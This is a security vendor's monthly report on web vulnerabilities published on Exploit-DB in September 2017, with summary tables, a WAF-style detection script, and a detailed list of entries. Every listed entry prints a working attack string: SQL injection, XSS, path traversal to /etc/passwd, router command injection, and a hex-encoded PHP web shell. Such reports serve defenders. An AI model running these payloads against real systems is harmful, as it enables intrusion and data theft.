
Summary: EDB-Report Latest Web Vulnerability Trend Report (2017.09) ~ Vulnerability trend information based on content published on Exploit-DB. Penta Security Systems Inc. R&D Center


1. Count by vulnerability category

Vulnerability category                      Count
File Upload                                 1
Command Injection                           2
Cross Site Scripting (XSS)                  2
Directory Traversal                         5
SQL Injection                               62
Total                                       72

2. Count by severity

Severity                    Count    Share
Urgent response required    64       88.89%
High                        5        6.94%
Medium                      3        4.17%
Total                       72       100.00%

3. Count by attack difficulty

Difficulty    Count    Share
Hard          2        2.78%
Medium        29       40.28%
Easy          41       56.94%
Total         72       100.00%

4. Number of vulnerabilities by major software

Software                                        Count
Joomla                                          2
A2billing                                       2
PHP Dashboards                                  2
Wordpress                                       1
ICHotelReservation                              1
IC-T-Shirt                                      1
iGreeting Cards                                 1
PTC KSV1 Script                                 1
Wireless Repeater                               1
ICProjectBidding                                1
The Car Project                                 1
ICClassifieds                                   1
Ultimate HR System                              1
Carlo Gavazzi Powersoft                         1
Cory Support                                    1
PTCEvolution                                    1
Pay Banner Text Link Ad                         1
ICEstate                                        1
Online Invoice System                           1
ICGrocery                                       1
EzInvoice                                       1
ICSurvey                                        1
EzBan                                           1
CodeMeter                                       1
My Builder Marketplace                          1
ICLowBidAuction                                 1
Law Firm                                        1
ICAffiliateTracking                             1
Restaurant Website Script                       1
Enterprise Edition Payment Processor Script     1
Professional Service Booking                    1
Apache Tomcat                                   1
Online Print Business                           1
ICHelpDesk                                      1
Just Dial Marketplace                           1
ICDental Clinic                                 1
Job Board Software                              1
ICCallLimousine                                 1
Babysitter Website Script                       1
ICProductConfigurator                           1
Escort Marketplace                              1
ICJewelry                                       1
JobStar Monster Clone Script                    1
ICStudents                                      1
ICAutosales                                     1
ICTraveling                                     1
ICDutchAuction                                  1
ICDoctor Appointment                            1
ICRestaurant software                           1
AirStar Airbnb Clone Script                     1
ICAuction                                       1
EduStar Udemy Clone Script                      1
ICMLM                                           1
iTech StockPhoto Script                         1
Carel PlantVisor                                1
iTech Book Store Script                         1
Indusoft Web Studio                             1
inClick Cloud Server                            1
Theater Management Script                       1
Gr8 Multiple Search Engine Script               1
Adserver Script                                 1
FoodStar                                        1
Justdial Clone Script                           1
osTicket                                        1
Contact Manager                                 1
XYZ Auto Classifieds                            1
NETGEAR ReadyNAS Surveillance                   1
Consumer Review Script                          1
ICSiteBuilder                                   1
Total                                           72

Vulnerability trend information for 2017.09.01~2017.09.31, based on content published on Exploit-DB (http://exploit-db.com).

Summary: The number of vulnerability reports published on Exploit-DB in September 2017 was 72 in total, and among them SQL injection, with 62 reports, was found most often. The SQL injection vulnerabilities published in September were classified as comparatively easy to exploit, because anyone who knows how to use an attack tool that can be downloaded through an online search can abuse them with little effort. At the same time as having such a low attack difficulty, SQL injection was classified as an attack requiring urgent response, because its severity is so high. Fortunately, most SQL injection attacks can be handled easily through a web application firewall. Therefore, to maintain continuous security, a multi-layered defense that makes use of both a web application firewall and secure coding must be implemented.

Penta Security Systems Inc. R&D Center, Data Security Team
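The summary above says most of the SQL injection attacks in this report can be handled by a web application firewall. As an added example, not code from Penta Security's report or any of its products, the Python sketch below shows the normalization such a filter needs before it can match the patterns seen in the detail table: percent-decoding, keeping the body of MySQL versioned comments such as /*!00002UNION*/ (which the server executes as the bare keyword), and case folding, followed by a handful of detection rules run over sample requests. The sample requests are constructed from the patterns in this report, and the rule names are assumptions.

```python
import re
import urllib.parse

# Constructed sample requests modelled on the attack strings in this report:
# boolean probes, MySQL versioned-comment evasion, export_set enumeration of
# information_schema, time-based probes and path traversal, plus two benign
# requests for contrast.
SAMPLE_REQUESTS = [
    "/index.php?page=static_pages&key=1%20and%201=1--",
    "/info.php?car_id=-5+/*!11122uNiOn*/(/*!11122sELect*/0x283129,VERSION())--+-",
    "/cms.php?id=-6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,(Select+export_set(5,@:=0,"
    "(select+count(*)from(information_schema.columns)),@,2))--+-",
    "/review-details.php?idvalue=9 and sleep(5)",
    "/download?type=document&filename=../../../../../etc/passwd",
    "/..%5c/..%5c/..%5c/..%5ctest.txt",
    "user='or 1=1 or ''='&pass='anything'",
    "/index.php?page=static_pages&key=about-us",
    "/courses/details?course_id=105",
]

# MySQL executes the body of /*!00002UNION*/ as the bare keyword, so a filter
# that drops comments wholesale misses it; the body must be kept.
VERSIONED_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.DOTALL)
# Any other comment is ignored by the server and can be dropped.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

def normalize(request: str) -> str:
    """Undo the encodings seen in the report before pattern matching."""
    s = request
    # Decode percent-encoding twice to catch double-encoded input; unquote_plus
    # also turns '+' into a space, as the query-string parser will.
    for _ in range(2):
        s = urllib.parse.unquote_plus(s)
    s = VERSIONED_COMMENT.sub(r" \1 ", s)
    s = PLAIN_COMMENT.sub(" ", s)
    # Collapse whitespace and fold case so SeLeCT, sELect and SELECT compare equal.
    return re.sub(r"\s+", " ", s).strip().lower()

# Rule names are assumptions for this example, not any product's signature ids.
RULES = [
    ("sqli-boolean-probe", re.compile(r"\b(and|or)\b\s*(\d+|'[^']*')\s*=\s*(\d+|'[^']*')")),
    ("sqli-union-select", re.compile(r"\bunion\b.{0,80}\bselect\b")),
    ("sqli-schema-enumeration", re.compile(r"information_schema|\bexport_set\s*\(")),
    ("sqli-time-based", re.compile(r"\b(sleep|benchmark)\s*\(")),
    ("path-traversal", re.compile(r"\.\./|\.\.\\")),
]

def classify(request: str) -> list[str]:
    """Return the names of every rule that matches the normalized request."""
    normalized = normalize(request)
    return [name for name, pattern in RULES if pattern.search(normalized)]

def scan(requests: list[str]) -> dict[str, list[str]]:
    """Classify each request; an empty list means no rule fired."""
    return {r: classify(r) for r in requests}

if __name__ == "__main__":
    for request, hits in scan(SAMPLE_REQUESTS).items():
        print(f"{hits or ['clean']}: {request}")
```

Signature matching of this kind is the first layer only; the report's own conclusion is that it must be paired with secure coding (parameterized queries, path validation) in the application.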

[Chart: Count by vulnerability category]

[Chart: Count by severity]

[Chart: Count by attack difficulty]

[Chart: Number of vulnerabilities by major software]

Detailed list (columns: Date | EDB No. | Vulnerability category | Attack difficulty | Severity | Vulnerability name | Attack code | Target program | Target environment)

2017-09-01 | EDB 42618 | XSS | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: WordPress Plugin Participants Database < 1.7.5.10 - XSS vulnerability
Attack code:
  POST http://localhost/?page_id=1 HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  first_name=<script>alert("1");</script>&last_name=a&email=a@a.com
Target program: Wordpress
Target environment: WordPress Plugin Participants Database < 1.7.5.10

2017-09-03 | EDB 42607 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Joomla! Component CheckList 1.1.0 - SQL Injection vulnerability
Attack code:
  /our-products/checklist/checklist/tag/social'and+(SeLeCT+1+FrOM+(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast(database()+as+char),0x7e))+FrOM+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+FrOM+information_schema.tables+group+by+x)a)+AND+''='.html
Target program: Joomla
Target environment: Joomla! Component CheckList 1.1.0

2017-09-03 | EDB 42606 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection vulnerability
Attack code:
  /index.php?option=com_surveyforce&task=start_invited&survey=19&invite=1%20and%201=1--
Target program: Joomla
Target environment: Joomla! Component Survey Force Deluxe 3.2.4

2017-09-04 | EDB 42608 | Command Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Wireless Repeater BE126 - Remote Code Execution vulnerability
Attack code:
  POST /cgi-bin/webupg HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  name=HTTP&url=http://www.test.com&user=;ls -al >/var/mycode;&password=a&port=8&dir=a
Target program: Wireless Repeater
Target environment: Wireless Repeater BE126

2017-09-04 | EDB 42610 | XSS | Difficulty: High | Severity: High
Vulnerability name: CodeMeter 6.50 - XSS vulnerability
Attack code:
  POST /actions/ChangeConfiguration.html HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Action=CertifiedTimeConfiguration&TimeServerList=cmtime.codemeter.com%7Ccmtime.codemeter.de%7Ccmtime.codemeter.us%7Ccmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>%7C
Target program: CodeMeter
Target environment: CodeMeter 6.50

2017-09-04 | EDB 42617 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: iGreeting Cards 1.0 - SQL Injection vulnerability
Attack code:
  /index.php?index&search&k=eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+-
Target program: iGreeting Cards
Target environment: iGreeting Cards 1.0

2017-09-04 | EDB 42616 | SQL Injection | Difficulty: Hard | Severity: Urgent response required
Vulnerability name: A2billing 2.x - SQL Injection vulnerability
Attack code:
  POST /a2billing/agent/Public/checkout_process.php HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c286261736536345f6465636f646528245f504f53545b6e61696c69745d29293b203f3e,7,8,9,10,11,12,13//**
  -&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb
Target program: A2billing
Target environment: A2billing 2.x

2017-09-05 | EDB 42619 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: The Car Project 1.0 - SQL Injection vulnerability
Attack code:
  /info.php?car_id=-5+/*!11122uNiOn*/(/*!11122sELect*/0x283129,0x283229,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,(44),0x28343529,0x28343629,0x28343729,0x28343829,0x28343929)
Target program: The Car Project
Target environment: The Car Project 1.0

2017-09-05 | EDB 42615 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: A2billing 2.x - SQL Injection vulnerability
Attack code:
  POST /a2billing/agent/Public/checkout_process.php HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  transactionID=1%20and%201=1--&sess_id=4148key=636902c6ed0db5780eb613d126e95268
Target program: A2billing
Target environment: A2billing 2.x

2017-09-05 | EDB 42628 | Directory Traversal | Difficulty: Easy | Severity: High
Vulnerability name: Ultimate HR System <= 1.2 - Directory Traversal vulnerability
Attack code:
  /download?type=document&filename=../../../../../etc/passwd
Target program: Ultimate HR System
Target environment: Ultimate HR System <= 1.2

2017-09-06 | EDB 42620 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: Cory Support - 'pr' Parameter SQL Injection vulnerability
Attack code:
  /listfaq.php?pr=9999+and+1=2+union+all+select+null,version()--
Target program: Cory Support
Target environment: Cory Support

2017-09-06 | EDB 42623 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: Pay Banner Text Link Ad 1.0.6.1 - SQL Injection vulnerability
Attack code:
  /index.php?action=stats&id=1%20and%201=1--
Target program: Pay Banner Text Link Ad
Target environment: Pay Banner Text Link Ad 1.0.6.1

2017-09-07 | EDB 42629 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Online Invoice System 3.0 - SQL Injection vulnerability
Attack code:
  /editclient.php?cid=-5+/*!00003uNiOn*/(/*!00003SelECt*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VERSION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(SelECt+CoUnt(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629)--+-
Target program: Online Invoice System
Target environment: Online Invoice System 3.0

2017-09-07 | EDB 42632 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: EzInvoice 6.02 - SQL Injection vulnerability
Attack code:
  /editclient.php?id=-100+/*!11122UniOn*/+/*!11122SeleCt*/+0x283129,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283329,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION())--+-
Target program: EzInvoice
Target environment: EzInvoice 6.02

2017-09-07 | EDB 42631 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: EzBan 5.3 - 'id' Parameter SQL Injection vulnerability
Attack code:
  /ezban.php?id=100++aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+1=1&action=show
Target program: EzBan
Target environment: EzBan 5.3

2017-09-09 | EDB 42645 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: My Builder Marketplace 1.0 - SQL Injection vulnerability
Attack code:
  /marketplace?start_date=1%20and%201=1--
Target program: My Builder Marketplace
Target environment: My Builder Marketplace 1.0

2017-09-09 | EDB 42643 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: Law Firm 1.0 - SQL Injection vulnerability
Attack code:
  /business-searchlist?country=1%20and%201=1--&state=1%20and%201=1--&city=1%20and%201=1--&farm_cat=1%20and%201=1--
Target program: Law Firm
Target environment: Law Firm 1.0

2017-09-09 | EDB 42642 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: Restaurant Website Script 1.0 - SQL Injection vulnerability
Attack code:
  /cms.php?id=-6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+-
Target program: Restaurant Website Script
Target environment: Restaurant Website Script 1.0

2017-09-09 | EDB 42641 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Professional Service Booking 1.0 - SQL Injection vulnerability
Attack code:
  /content.php?page=-7+/*!50000UniOn*/+/*!50000SelECt*/+0x496873616e2053656e63616e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--
Target program: Professional Service Booking
Target environment: Professional Service Booking 1.0

2017-09-09 | EDB 42640 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Online Print Business 1.0 - SQL Injection vulnerability
Attack code:
  /product-decs.php?cat_id=-149++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28323729,0x28323829,0x28323929)--
Target program: Online Print Business
Target environment: Online Print Business 1.0

2017-09-09 | EDB 42639 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Just Dial Marketplace 1.0 - SQL Injection vulnerability
Attack code:
  /result/1%20and%201=1--/eFe/
Target program: Just Dial Marketplace
Target environment: Just Dial Marketplace 1.0

2017-09-09 | EDB 42637 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Job Board Software 1.0 - SQL Injection vulnerability
Attack code:
  /job-details/-131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229)--/eFe
Target program: Job Board Software
Target environment: Job Board Software 1.0

2017-09-09 | EDB 42636 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Babysitter Website Script 1.0 - SQL Injection vulnerability
Attack code:
  /taskers?skills=63'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+1=1='
Target program: Babysitter Website Script
Target environment: Babysitter Website Script 1.0

2017-09-09 | EDB 42635 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Escort Marketplace 1.0 - SQL Injection vulnerability
Attack code:
  /prof_detils.html?escort=-1418820035'+/*!11112UnIoN*/+(/*!11112SelEcT*/0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(/*!11112SelEcT*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629)--
Target program: Escort Marketplace
Target environment: Escort Marketplace 1.0

2017-09-11 | EDB 42655 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: JobStar Monster Clone Script 1.0 - SQL Injection vulnerability
Attack code:
  /jobdetailshow?id=1%20and%201=1--
Target program: JobStar Monster Clone Script
Target environment: JobStar Monster Clone Script 1.0

2017-09-11 | EDB 42654 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: PHP Dashboards NEW 4.4 - SQL Injection vulnerability
Attack code:
  /php/share/save.php?dashID=1%20and%201=1--
Target program: PHP Dashboards
Target environment: PHP Dashboards NEW 4.4

2017-09-11 | EDB 42653 | Directory Traversal | Difficulty: Easy | Severity: High
Vulnerability name: PHP Dashboards NEW 4.4 - Directory Traversal vulnerability
Attack code:
  /php/file/read.php?filename=../../../etc/passwd
Target program: PHP Dashboards
Target environment: PHP Dashboards NEW 4.4

2017-09-11 | EDB 42659 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: AirStar Airbnb Clone Script 1.0 - SQL Injection vulnerability
Attack code:
  /airstar/hotel/roomsedit/detailedroom/6 AND 8995=8995?mem_count=1&check_in=&check_out=&search_city=Madurai,India&min_amt=10&max_amt=150&inout=0
Target program: AirStar Airbnb Clone Script
Target environment: AirStar Airbnb Clone Script 1.0

2017-09-11 | EDB 42658 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: EduStar Udemy Clone Script 1.0 - SQL Injection vulnerability
Attack code:
  /courses/details?course_id=105 and 1=1
Target program: EduStar Udemy Clone Script
Target environment: EduStar Udemy Clone Script 1.0

2017-09-11 | EDB 42657 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: iTech StockPhoto Script 2.02 - SQL Injection vulnerability
Attack code:
  POST / HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  stock=19 AND 9771=9771
Target program: iTech StockPhoto Script
Target environment: iTech StockPhoto Script 2.02

2017-09-11 | EDB 42656 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: iTech Book Store Script 2.02 - SQL Injection vulnerability
Attack code:
  /book_details.php?id=id=2 AND SLEEP(5)--
Target program: iTech Book Store Script
Target environment: iTech Book Store Script 2.02

2017-09-12 | EDB 42663 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: inClick Cloud Server 5.0 - SQL Injection vulnerability
Attack code:
  /client.php?pageid=sites&subpid=modify&site_id=1-1++/*!00008UniOn*/+/*!00008sEleCT*/+0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129--
Target program: inClick Cloud Server
Target environment: inClick Cloud Server 5.0

2017-09-12 | EDB 42662 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: Gr8 Multiple Search Engine Script 1.0 - SQL Injection vulnerability
Attack code:
  /1%20and%201=1--/X.html
Target program: Gr8 Multiple Search Engine Script
Target environment: Gr8 Multiple Search Engine Script 1.0

2017-09-12 | EDB 42661 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: FoodStar 1.0 - SQL Injection vulnerability
Attack code:
  /public/frontend/search?keyword=1%20and%201=1--
Target program: FoodStar
Target environment: FoodStar 1.0

2017-09-12 | EDB 42660 | SQL Injection | Difficulty: Hard | Severity: Urgent response required
Vulnerability name: osTicket 1.10 - SQL Injection vulnerability
Attack code:
  /file.php?key[id` = 1 UNION SELECT 1,2,3--]=1&signature=1&expires=15104725311
Target program: osTicket
Target environment: osTicket 1.10

2017-09-12 | EDB 42727 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: XYZ Auto Classifieds 1.0 - SQL Injection vulnerability
Attack code:
  /xyz-auto-classifieds/item/view/13 and sleep(5)
Target program: XYZ Auto Classifieds
Target environment: XYZ Auto Classifieds 1.0

2017-09-12 | EDB 42728 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: Consumer Review Script 1.0 - SQL Injection vulnerability
Attack code:
  /review-details.php?idvalue=9 and sleep(5)
Target program: Consumer Review Script
Target environment: Consumer Review Script 1.0

2017-09-13 | EDB 42689 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICSiteBuilder 1.1 - SQL Injection vulnerability
Attack code:
  /index.php?page=news&nid=1%20and%201=1--
Target program: ICSiteBuilder
Target environment: ICSiteBuilder 1.1

2017-09-13 | EDB 42688 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICHelpDesk 1.1 - 'pk' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&pk=1%20and%201=1--
Target program: ICHelpDesk
Target environment: ICHelpDesk 1.1

2017-09-13 | EDB 42687 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICEstate 1.1 - 'id' Parameter SQL Injection vulnerability
Attack code:
  /details.aspx?id=1%20and%201=1--
Target program: ICEstate
Target environment: ICEstate 1.1

2017-09-13 | EDB 42686 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICDental Clinic 1.2 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&key=1%20and%201=1--
Target program: ICDental Clinic
Target environment: ICDental Clinic 1.2

2017-09-13 | EDB 42685 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICProjectBidding 1.1 - SQL Injection vulnerability
Attack code:
  /admin/editadminuser.php?id=1%20and%201=1--
Target program: ICProjectBidding
Target environment: ICProjectBidding 1.1

2017-09-13 | EDB 42684 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICCallLimousine 1.1 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&key=1%20and%201=1--
Target program: ICCallLimousine
Target environment: ICCallLimousine 1.1

2017-09-13 | EDB 42682 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICGrocery 1.1 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&key=1%20and%201=1--
Target program: ICGrocery
Target environment: ICGrocery 1.1

2017-09-13 | EDB 42681 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICProductConfigurator 1.1 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&key=1%20and%201=1--
Target program: ICProductConfigurator
Target environment: ICProductConfigurator 1.1

2017-09-13 | EDB 42680 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: IC-T-Shirt 1.2 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&key=1%20and%201=1--
Target program: IC-T-Shirt
Target environment: IC-T-Shirt 1.2

2017-09-13 | EDB 42679 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICJewelry 1.1 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_pages&key=1%20and%201=1--
Target program: ICJewelry
Target environment: ICJewelry 1.1

2017-09-13 | EDB 42678 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICSurvey 1.1 - SQL Injection vulnerability
Attack code:
  /survey.php?page=preview&test=1%20and%201=1--
Target program: ICSurvey
Target environment: ICSurvey 1.1

2017-09-13 | EDB 42677 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: ICStudents 1.2 - 'key' Parameter SQL Injection vulnerability
Attack code:
  /index.php?page=static_page&key=-EfE'+/*!00009UniOn*/+/*!00009SelEcT*/+0x31,0x32,0x3c68313e494853414e2053454e43414e3c2f68313e,(/*!00009Select*/+export_set(5,@:=0,(/*!00009select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00009table_name*/,0x3c6c693e,2),/*!00009column_name*/,0xa3a,2)),@,2))--
Target program: ICStudents
Target environment: ICStudents 1.2

2017-09-13 | EDB 42676 | SQL Injection | Difficulty: High | Severity: Urgent response required
Vulnerability name: ICClassifieds 1.1 - SQL Injection vulnerability
Attack code:
  /post_details.php?city=0&id=-3061'++/*!00004UNION*/+/*!00004SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,(/*!00004Select*/+export_set(5,@:=0,(/*!00004select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00004table_name*/,0x3c6c693e,2),/*!00004column_name*/,0xa3a,2)),@,2)),0x496873616e2053656e63616e,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137--
Target program: ICClassifieds
Target environment: ICClassifieds 1.1

2017-09-13 | EDB 42675 | SQL Injection | Difficulty: Easy | Severity: Urgent response required
Vulnerability name: ICTraveling 2.2 - SQL Injection vulnerability
Attack code:
  POST /admin HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  user='or 1=1 or ''='&pass='anything'
Target program: ICTraveling
Target environment: ICTraveling 2.2

